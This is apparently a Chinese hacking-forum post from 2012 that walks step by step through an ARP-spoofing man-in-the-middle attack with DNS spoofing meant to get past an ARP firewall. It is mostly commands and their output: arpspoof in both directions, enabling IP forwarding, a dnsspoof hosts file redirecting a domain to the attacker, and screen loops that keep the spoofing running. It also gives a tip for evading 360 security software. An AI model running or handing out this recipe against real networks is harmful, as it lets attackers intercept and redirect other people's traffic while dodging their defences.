找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3374|回复: 0
打印 上一主题 下一主题

通过DNS欺骗突破ARP防火墙的简单步骤

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-31 10:15:58 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
测试下DNS欺骗能否成功吧: ~# netstat -r Kernel IP routing table Destination Gateway Genmask Flags MSS Window irtt Iface 5.5.5.0 * 255.255.255.0 U 0 0 0 eth0 link-local * 255.255.0.0 U 0 0 0 eth0 default 1.1.1.2 0.0.0.0 UG 0 0 0 eth0 ~# a


-

  
先测试下DNS欺骗能否成功吧:

~# netstat -r
Kernel IP routing table
Destination     Gateway         Genmask         Flags   MSS Window  irtt Iface
5.5.5.0         *               255.255.255.0   U         0 0          0 eth0
link-local      *               255.255.0.0     U         0 0          0 eth0
default         1.1.1.2        0.0.0.0         UG        0 0          0 eth0
~# arpspoof 1.1.1.2 -t 1.1.1.5    /终端1
~# arpspoof 1.1.1.5  -t 1.1.1.2     /终端2
~# echo 1 > /proc/sys/net/ipv4/ip_forward    /转发
打开arp防火墙后发现有动静即算成功
复制代码

欺骗下dns 不停的发包吧~~~
~# cat baidu
1.1.1.4  www.political-security.com  /1.1.1.4本机的
~# dnsspoof -f baidu host 1.1.1.1.5 and udp  port 53
~#cat send   /继续不停的发包~~~
arpspoof 1.1.1.5 -t 1.1.1.2
arpspoof 1.1.1.2 -t 1.1.1.5
~# screen ./send
[1]+  Stopped                 screen ./send
~#screen ./send
[2]+  Stopped                 screen ./send      /多做几次就可以射了
~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~
~#screen -ls  /看下进程
There are screens on:
        3754.pts-7.TzSec Team        (11/01/2012 12:21:47 AM)        (Detached)
        3750.pts-7.TzSec Team        (11/01/2012 12:21:46 AM)        (Detached)
        3746.pts-7.TzSec Team        (11/01/2012 12:21:44 AM)        (Detached)
        3742.pts-7.TzSec Team        (11/01/2012 12:21:41 AM)        (Detached)
        3722.pts-4.TzSec Team        (11/01/2012 12:21:21 AM)        (Attached)
6 Sockets in /var/run/screen/S-root.
~#
下面就是转到win下
ping www.political-security.com
Pinging www.political-security.com [1.1.1.4] with 32 bytes of data:

Reply from 1.1.1.4: bytes=32 time<1ms TTL=64
Reply from 1.1.1.4: bytes=32 time<1ms TTL=64
复制代码

对于360应该伪装下发包源就可以了
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表